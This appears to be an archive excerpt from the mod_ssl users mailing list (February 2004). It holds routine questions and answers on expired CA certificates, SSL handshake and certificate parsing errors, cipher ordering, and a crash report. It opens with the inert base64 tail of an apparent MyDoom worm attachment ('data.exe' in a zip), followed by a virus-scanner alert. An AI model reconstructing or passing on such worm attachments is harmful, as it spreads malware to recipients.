AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEsBAhQA
CgAAAAAAaFBJMMonH54AWAAAAFgAAAgAAAAAAAAAAAAgAAAAAAAAAGRhdGEuZXhlUEsFBgAAAAAB
AAEANgAAACZYAAAAAA==

------=_NextPart_000_0002_C766E71C.5E4A742C--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From md.info_virus@org.mitsubishicorp.com  Mon Feb  9 17:47:14 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mailrelay10.mitsubishi.co.jp (mailrelay10.mitsubishicorp.com [202.221.150.135])
	by master.modssl.org (Postfix) with ESMTP id D404DA8934
	for ; Mon,  9 Feb 2004 17:47:01 +0100 (CET)
Received: from mitvs110.jp.mitsubishicorp.com (mc20.mitsubishicorp.com [202.32.170.208])
	by mailrelay10.mitsubishi.co.jp (8.12.10/8.12.10) with ESMTP id i19Gg8ng005691
	for ; Tue, 10 Feb 2004 01:42:09 +0900
Received: by mitvs110.jp.mitsubishicorp.com (Postfix, from userid 0)
	id 1F4831C8878; Tue, 10 Feb 2004 01:46:53 +0900 (JST)
Received: from localhost (localhost [127.0.0.1])
	by mitvs110.jp.mitsubishicorp.com (Postfix) with SMTP id 156B01E6C10
	for ; Tue, 10 Feb 2004 01:46:53 +0900 (JST)
From: md.info_virus@org.mitsubishicorp.com
To: modssl-users-l@master.modssl.org
Subject: Virus Alert!!(110)
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit
Message-Id: <20040209164653.1F4831C8878@mitvs110.jp.mitsubishicorp.com>
Date: Tue, 10 Feb 2004 01:46:53 +0900 (JST)

02/10/2004 01:46:45 , modssl-users-l@master.modssl.org $B$+$i(Bikuo.morinaga@mitsubishicorp.com$B08$N%a!<%k$NE:IU%U%!%$%k(Bdoc.zip$B$+$i%&%#%k%9(BWORM_MYDOOM.A$B$,8!=P$5$l$^$7$?!#(B
$B%&%#%k%9%A%'%C%/%5!<%P!<$,(Bdeleted(*)$B$7$^$7$?!#(B 
*clean$B$N>l9g!"E:IU%U%!%$%k$O%&%#%k%96n=|$5$l!"@5>o$KAwIU$5$l$F$$$^$9!#(B
*delete$B$N>l9g!"E:IU%U%!%$%k$OAwIU$5$l$F$$$^$;$s$N$G!"%&%#%k%9$r6n=|$7!":FAw$7$F2<$5$$!#(B
               From  : $B;0I)>&;v%a!<%k4IM}
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 42AB6A8995; Tue, 10 Feb 2004 14:05:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smline.swissmail.ch (smline.swissmail.ch [195.162.162.160])
	by master.modssl.org (Postfix) with ESMTP id 82D05A898B
	for ; Tue, 10 Feb 2004 14:05:24 +0100 (CET)
Received: from localhost (relay.as8833.net [195.162.162.161])
	by smline.swissmail.ch (Postfix) with ESMTP id DD1EE316791
	for ; Tue, 10 Feb 2004 14:05:18 +0100 (CET)
Received: from smline.swissmail.ch ([195.162.162.160])
 by localhost (relay.as8833.net [195.162.162.161]) (amavisd-new, port 10024)
 with ESMTP id 58324-03 for ;
 Tue, 10 Feb 2004 14:05:32 +0100 (CET)
Received: from arjun.finance.ch (unknown [195.162.166.2])
	by smline.swissmail.ch (Postfix) with ESMTP id 9DA6B316790
	for ; Tue, 10 Feb 2004 14:05:16 +0100 (CET)
Message-Id: <5.2.1.1.0.20040210140838.034d0610@pop.finance.ch>
X-Sender: chisholm_finance_ch@pop.finance.ch
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Tue, 10 Feb 2004 14:13:30 +0100
To: modssl-users@modssl.org
From: Rory Chisholm 
Subject: Expired CA Certificate
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: by amavisd-new at swissmail.ch
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rory Chisholm 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This isn't totally modssl related but maybe someone knows the answer.

I'm using OpenSCEP with openssl. My CA Certificate has just expired.
Now since our VPN sees very little use (only one important user) I'd like 
to re-issue
the x509 CA certificate with the same key but different attributes (a later 
expiry date).

Can this be done without re-generating every certificate ever issued from 
scratch ? The
real question here is do x509 certificates that have been signed by a CA 
certificate store a
hash of the CA certificate based solely on the CA's key or based on the 
full CA certificate including
it's attributes ?

Has anyone had any experience doing this ?

			Thanks for any help,

					Rory Chisholm

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 10 15:09:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 27179A8995; Tue, 10 Feb 2004 15:09:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from FW1.dt.navy.mil (FW1.dt.navy.mil [192.5.27.135])
	by master.modssl.org (Postfix) with ESMTP id EAE1CA8934
	for ; Tue, 10 Feb 2004 15:09:38 +0100 (CET)
Received: by FW1.dt.navy.mil; id JAA15093; Tue, 10 Feb 2004 09:09:37 -0500 (EST)
Received: from unknown(130.46.225.15) by FW1.dt.navy.mil via smap (V5.5)
	id xma015063; Tue, 10 Feb 04 09:09:35 -0500
Received: from crbeex01.nswccd.navy.mil ([130.46.225.84])
 by NAVGATE.dt.navy.mil (SAVSMTP 3.0.0.44) with SMTP id M2004021009074925771
 for ; Tue, 10 Feb 2004 09:07:49 -0500
Received: by crbeex01.nswccd.navy.mil with Internet Mail Service (5.5.2657.72)
	id <1VH2PNDJ>; Tue, 10 Feb 2004 09:09:33 -0500
Message-ID: 
From: Shea Janet B CRBE 
To: "'modssl-users@modssl.org'" 
Subject: FW: SSL stopped working
Date: Tue, 10 Feb 2004 09:09:32 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shea Janet B CRBE 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Second try - this apparently did not make it to the list yesterday. And - an update:

SSL works some of the time - could this point to a lack of entropy? I am using egd-0.9 since this is a Solaris 7 machine.

Janet Shea


>  -----Original Message-----
> From: 	Shea Janet B CRBE  
> Sent:	Monday, February 09, 2004 15:30
> To:	'modssl-users@modssl.org'
> Subject:	SSL stopped working
> 
> I had SSL working on my site on Friday. Today, everytime I try to access it via SSL, I receive "This page cannot be displayed".
> In Apache's error log, I get the following entry for each attempt:
> 
> [Mon Feb  9 08:08:55 2004] [error] mod_ssl: SSL handshake failed (server scribe.
> dt.navy.mil:443, client xxx.xxx.xxx.xxx) (OpenSSL library error follows)
> [Mon Feb  9 08:08:55 2004] [error] OpenSSL:error:1408F455:SSL routines:SSL3_GET
> _RECORD:decryption failed or bad record mac
> 
> I have tried researching this in the archives, but so far, I have not found anything I can use.
> 
> Where do I look to fix this error?
> 
> The software:
>     Solaris 7
>     Apache 1.3.29
>     mod_ssl-2.18.16-1.3.29
>     openssl-0.9.6l
>     auth-ldap-1.6.0
> 
> By the way, please respond directly to me. My requests (3!) to subscribe to modssl-users and modssl-announce apparently
> have gone to the bit bucket.
> 
> Janet Shea
> System Administrator
> NSWC, Carderock Div
> sheajb@nswccd.navy.mil
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 11 09:47:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D46C6A8939; Wed, 11 Feb 2004 09:47:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gateway.helzberg.com (65-64-107-194.ded.swbell.net [65.64.107.194])
	by master.modssl.org (Postfix) with ESMTP id 8F9E9A8946
	for ; Wed, 11 Feb 2004 09:47:10 +0100 (CET)
Received: from viruswall.helzberg.com (viruswall.helzberg.com [172.16.0.18])
	by gateway.helzberg.com with SMTP id i1AM95qE003179
	for ; Tue, 10 Feb 2004 16:09:06 -0600 (CST)
Received: from 172.16.254.253 by viruswall.helzberg.com (InterScan E-Mail VirusWall NT); Tue, 10 Feb 2004 16:00:40 -0600
Received: from ISCRTN34 ([172.16.28.34]) by mail.helzberg.com
          (Netscape Mail Server v2.02) with SMTP id AAA28997
          for ; Tue, 10 Feb 2004 16:07:11 -0600
From: fdyanez@helzberg.com (Florian Yanez)
To: 
Subject: RE: Expired CA Certificate
Date: Tue, 10 Feb 2004 16:04:35 -0600
Message-ID: <000f01c3f021$df408380$221c10ac@ISCRTN34>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.6604 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
In-Reply-To: <5.2.1.1.0.20040210140838.034d0610@pop.finance.ch>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fdyanez@helzberg.com (Florian Yanez)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We recently had a problem with our Verisign Intermediate CA Certificate.
This link (https://www.verisign.com/support/site/caReplacement.html) points
to how they said to fix the problem.  Your case may be similar.

Florian Yanez
Manager of Technical Systems
Helzberg Diamond Shops, Inc.
fdyanez@helzberg.com
816-627-1253


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Rory Chisholm
Sent: Tuesday, February 10, 2004 7:14 AM
To: modssl-users@modssl.org
Subject: Expired CA Certificate


This isn't totally modssl related but maybe someone knows the answer.

I'm using OpenSCEP with openssl. My CA Certificate has just expired.
Now since our VPN sees very little use (only one important user) I'd like
to re-issue
the x509 CA certificate with the same key but different attributes (a later
expiry date).

Can this be done without re-generating every certificate ever issued from
scratch ? The
real question here is do x509 certificates that have been signed by a CA
certificate store a
hash of the CA certificate based solely on the CA's key or based on the
full CA certificate including
it's attributes ?

Has anyone had any experience doing this ?

			Thanks for any help,

					Rory Chisholm

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 12 15:30:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D820DA8A51; Thu, 12 Feb 2004 15:30:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from box06.servers.boxingorange.com (mail.boxingorange.com [195.92.77.104])
	by master.modssl.org (Postfix) with ESMTP id BD14FA89E6
	for ; Thu, 12 Feb 2004 15:30:08 +0100 (CET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: force mod_ssl to choose 3DES over RC4 ciphers?
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Date: Thu, 12 Feb 2004 14:30:06 -0000
Message-ID: <5ECDE4867BF28E4C8DD3A42A1FD4E94D5E8FFB@box06.servers.boxingorange.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: force mod_ssl to choose 3DES over RC4 ciphers?
thread-index: AcPxdLVj3X4/+wraQ8mHWyy3qe8xtQ==
Importance: normal
From: "Daniel Eggleston" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Eggleston" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,

I would like our secure server to default to 3DES 168-bit high
encryption for SSL sessions, but with the ability to fall back to 128-
bit RC4 _only_ if the client doesn't support 3DES. My current cipher-
spec for the SSLCipherSuite directive is 'HIGH:MEDIUM' which, with my
version of OpenSSL, equates to:

EDH-RSA-DES-CBC3-SHA:EDH-DSS-DES-CBC3-SHA:DES-CBC3-SHA:DES-CBC3-
MD5:RC4-SHA:RC4-MD5:RC2-CBC-MD5:RC4-MD5

Is it possible to construct a cipher-spec string that will make
Apache/mod_ssl choose a 3DES cipher when both RC4 and 3DES are
'offered' by the client (most clients seem to offer RC4 ciphers before
3DES ones in the 'Client Hello').

It seems that unless I completely disable RC4 on the server, it always
gets chosen ahead of 3DES :-( This is my first post here so thanks in
advance for any help.

Kind Regards, 
 
 
 
 
 
 
Daniel Eggleston 
Senior Network Developer 
Boxing Orange Ltd  
t: 0871 871 2774 
f: 0871 

871 0068  
 
Daniel.Eggleston@boxingorange.com 
http://www.boxingorange.com/ 
 
This message (and any associated files) is intended only for the  
use 

of the individual or entity to which it is addressed and may  
contain information that is 

confidential, subject to copyright or 
constitutes a trade secret. If you are not the intended 

recipient  
you are hereby notified that any dissemination, copying or  
distribution of this 

message, or files associated with this message,  
is strictly prohibited. If you have received this 

message in error,  
please notify us immediately by replying to the message and deleting  
it from 

your computer. Messages sent to and from us may be monitored.  
 
Internet communications cannot be guaranteed to be secure or error-free  
as 

information could be intercepted, corrupted, lost, destroyed, arrive  
late or incomplete, or 

contain viruses. Therefore, we do not accept  
responsibility for any errors or omissions that are 

present in this  
message, or any attachment, that have arisen as a result of e-mail 

 
transmission. If verification is required, please request a hard-copy  
version. Any views or 

opinions presented are solely those of the author  
and do not necessarily represent those of the 

company.  
 
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 12 16:16:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9E36BA8963; Thu, 12 Feb 2004 16:16:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.rsv.se (smtp1.rsv.se [137.61.237.10])
	by master.modssl.org (Postfix) with ESMTP id 6ECD5A8941
	for ; Thu, 12 Feb 2004 16:16:11 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by smtp3.rsv.se (Postfix) with ESMTP id 29B3428B
	for ; Thu, 12 Feb 2004 16:16:09 +0100 (MET)
Date: Thu, 12 Feb 2004 16:15:29 +0100 (MET)
From: Ringaby Anders 
X-X-Sender:  
To: 
Subject: variable lookup failed for /opt/apache-2.0.48/conf::private_key
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by amavisd-new at rsv.se
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ringaby Anders 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello !

Can anyone help me with this one ?


When the sign.sh script runs the following command:

openssl ca -config /opt/apache-2.0.48/conf/ca.config -out $CERT -infiles $CSR


Then I get this error message:

variable lookup failed for /opt/apache-2.0.48/conf::private_key


The private key file is there, and everything, but still ....

Any changes I try to make to the config files ca.config or openssl.cnf
does not make things any better, and no crt-file is created.

What am I doing wrong ?


Regards

Anders



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 12 16:28:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9EBB8A89E6; Thu, 12 Feb 2004 16:28:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 0E895A8A51
	for ; Thu, 12 Feb 2004 16:28:18 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 0A64F20A5
	for ; Thu, 12 Feb 2004 16:28:09 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 83F9820A2; Thu, 12 Feb 2004 16:28:06 +0100 (MET)
Date: Thu, 12 Feb 2004 16:28:06 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: force mod_ssl to choose 3DES over RC4 ciphers?
Message-ID: <20040212152806.GA6848@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <5ECDE4867BF28E4C8DD3A42A1FD4E94D5E8FFB@box06.servers.boxingorange.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5ECDE4867BF28E4C8DD3A42A1FD4E94D5E8FFB@box06.servers.boxingorange.com>
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.4i
X-Virus-Scanned: by amavisd 0.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Feb 12, 2004 at 02:30:06PM -0000, Daniel Eggleston wrote:
> Hello all,
> 
> I would like our secure server to default to 3DES 168-bit high
> encryption for SSL sessions, but with the ability to fall back to 128-
> bit RC4 _only_ if the client doesn't support 3DES. My current cipher-
> spec for the SSLCipherSuite directive is 'HIGH:MEDIUM' which, with my
> version of OpenSSL, equates to:
> 
> EDH-RSA-DES-CBC3-SHA:EDH-DSS-DES-CBC3-SHA:DES-CBC3-SHA:DES-CBC3-
> MD5:RC4-SHA:RC4-MD5:RC2-CBC-MD5:RC4-MD5
> 
> Is it possible to construct a cipher-spec string that will make
> Apache/mod_ssl choose a 3DES cipher when both RC4 and 3DES are
> 'offered' by the client (most clients seem to offer RC4 ciphers before
> 3DES ones in the 'Client Hello').
> 
> It seems that unless I completely disable RC4 on the server, it always
> gets chosen ahead of 3DES :-( This is my first post here so thanks in
> advance for any help.

There is no such way by modifying the cipher suite.
The server always chooses the first ciphersuite supported by the server
according to the list sent by the client.
OpenSSL 0.9.7 does support an option to change this behaviour such that
the server's preferences are used, but to my best knowledge there is no
switch in mod_ssl to set this flag.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 12 17:34:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F3A52A8A4B; Thu, 12 Feb 2004 17:34:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id 3EC8AA8A51
	for ; Thu, 12 Feb 2004 17:34:15 +0100 (CET)
Received: from [80.5.91.122] (HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.1.8)
  with ESMTP id 9016950 for modssl-users@modssl.org; Thu, 12 Feb 2004 16:34:10 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Thu, 12 Feb 2004 16:34:08 +0000
Subject: Setting up multiple SSL certs on a mac 10.3 server problems
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: <20040212152806.GA6848@serv01.aet.tu-cottbus.de>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi there,

Having problems setting up multiple certs on a 10.3 box. I've got one
running on the machine yet I can't seem to get any of the others to work I
get this error message:

[Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
(www.royalcaribbean.co.uk:16443) Ops, no RSA or DSA server
certificate found?!
[Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
(www.royalcaribbean.co.uk:16443) You have to perform a
*full* server restart when you added or removed a
certificate and/or key file
[Thu Feb 12 09:19:28 2004] [error] mod_ssl: Init: Unable to
read server certificate from file
/etc/httpd/ssl.key/royal.crt (OpenSSL library error
follows)
[Thu Feb 12 09:19:28 2004] [error] OpenSSL:
error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
tag
[Thu Feb 12 09:19:28 2004] [error] OpenSSL:
error:0D07803A:asn1 encoding
routines:ASN1_ITEM_EX_D2I:nested asn1 error
[Thu Feb 12 09:19:34 2004] [error] mod_ssl: Init: Unable to
read server certificate from file
/etc/httpd/ssl.key/royal.crt (OpenSSL library error
follows)
[Thu Feb 12 09:19:34 2004] [error] OpenSSL:
error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
tag
[Thu Feb 12 09:19:34 2004] [error] OpenSSL:
error:0D07803A:asn1 encoding
routines:ASN1_ITEM_EX_D2I:nested asn1 error


I know the cert's are OK. Definitely! I've been getting new ones off
Geotrust (the techies there are really helpful!) and I've used everyway
under the sun to input them. Still won't work tho. So I'm thinking the
problem lies somewhere else! Anyone got any idea what could be going wrong?

Thanks

Huw Jenkins

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 13 01:03:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 610BBA8963; Fri, 13 Feb 2004 01:03:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Cantor.suse.de (ns.suse.de [195.135.220.2])
	by master.modssl.org (Postfix) with ESMTP id 7D63BA8958
	for ; Fri, 13 Feb 2004 01:03:07 +0100 (CET)
Received: from hermes.suse.de (Hermes.suse.de [195.135.221.8])
	(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by Cantor.suse.de (Postfix) with ESMTP id DDAF617CE74
	for ; Fri, 13 Feb 2004 01:03:05 +0100 (CET)
Received: by D59.suse.de (Postfix, from userid 10668)
	id 9FBEE39D8651; Fri, 13 Feb 2004 01:03:05 +0100 (CET)
Date: Fri, 13 Feb 2004 01:03:05 +0100
From: Juergen Weigert 
To: modssl-users@modssl.org
Subject: Crash in mod_ssl-2.8.10
Message-ID: <20040213000305.GG28761@suse.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Juergen Weigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi there!

I have a crash that looks very similar to the ones described in 
http://marc.theaimsgroup.com/?l=apache-modssl&m=106001869701959&q=raw
and 
http://marc.theaimsgroup.com/?l=apache-modssl&m=99073424917407&w=2

I assume that this is caused by pointers that reference into free()d and
possibly re-used memory.

Does anybody know if that is fixed by now? 
>From the references above, I learn that this issue known as BugDB PR#569.
http://www.modssl.org/support/bugdb/index.cgi appears defunct.

        thanks,
                Jw.

-- 
 o \  Juergen Weigert  paint it green!__/ _=======.=======_
 | jw@suse.de       linux software/        _---|____________\/
 \  | 0911 74053-508   creator  __/          (____/            /\
(/) | _________________________/              _/ \_ vim:set sw=2 wm=8
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 13 08:32:38 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 27BD1A8958; Fri, 13 Feb 2004 08:32:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 3F5B9A8959
	for ; Fri, 13 Feb 2004 08:32:23 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 2BEAD260F
	for ; Fri, 13 Feb 2004 08:32:21 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 0104A260D; Fri, 13 Feb 2004 08:32:17 +0100 (MET)
Date: Fri, 13 Feb 2004 08:32:17 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Setting up multiple SSL certs on a mac 10.3 server problems
Message-ID: <20040213073217.GB19372@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20040212152806.GA6848@serv01.aet.tu-cottbus.de> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.4i
X-Virus-Scanned: by amavisd 0.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Feb 12, 2004 at 04:34:08PM +0000, Huw Jenkins wrote:
> Hi there,
> 
> Having problems setting up multiple certs on a 10.3 box. I've got one
> running on the machine yet I can't seem to get any of the others to work I
> get this error message:
> 
> [Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
> (www.royalcaribbean.co.uk:16443) Ops, no RSA or DSA server
> certificate found?!
> [Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
> (www.royalcaribbean.co.uk:16443) You have to perform a
> *full* server restart when you added or removed a
> certificate and/or key file
> [Thu Feb 12 09:19:28 2004] [error] mod_ssl: Init: Unable to
> read server certificate from file
> /etc/httpd/ssl.key/royal.crt (OpenSSL library error
> follows)
> [Thu Feb 12 09:19:28 2004] [error] OpenSSL:
> error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag
> [Thu Feb 12 09:19:28 2004] [error] OpenSSL:
> error:0D07803A:asn1 encoding
> routines:ASN1_ITEM_EX_D2I:nested asn1 error
> [Thu Feb 12 09:19:34 2004] [error] mod_ssl: Init: Unable to
> read server certificate from file
> /etc/httpd/ssl.key/royal.crt (OpenSSL library error
> follows)
> [Thu Feb 12 09:19:34 2004] [error] OpenSSL:
> error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag
> [Thu Feb 12 09:19:34 2004] [error] OpenSSL:
> error:0D07803A:asn1 encoding
> routines:ASN1_ITEM_EX_D2I:nested asn1 error
> 
> 
> I know the cert's are OK. Definitely! I've been getting new ones off
> Geotrust (the techies there are really helpful!) and I've used everyway
> under the sun to input them. Still won't work tho. So I'm thinking the
> problem lies somewhere else! Anyone got any idea what could be going wrong?

The error message indicates, that the contents of the certificate cannot
be correctly parsed. You should be able to verify this with the
openssl command line tool:
  openssl x509 -in /etc/httpd/ssl.key/royal.crt -text
If the certificate is ok, you should see its contents here. But as the
tool is using the same routines as mod_ssl...

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From ListManager-admin@lists.wedi.org  Mon Feb 16 07:35:32 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from [63.251.80.233] (lists.matrixgroup.net [63.251.80.233])
	by master.modssl.org (Postfix) with SMTP id EA5EDA8973
	for ; Mon, 16 Feb 2004 07:35:19 +0100 (CET)
Message-Id: 
X-ListManager-type: post-failed
From: "ListManager" 
Reply-To: "ListManager" 
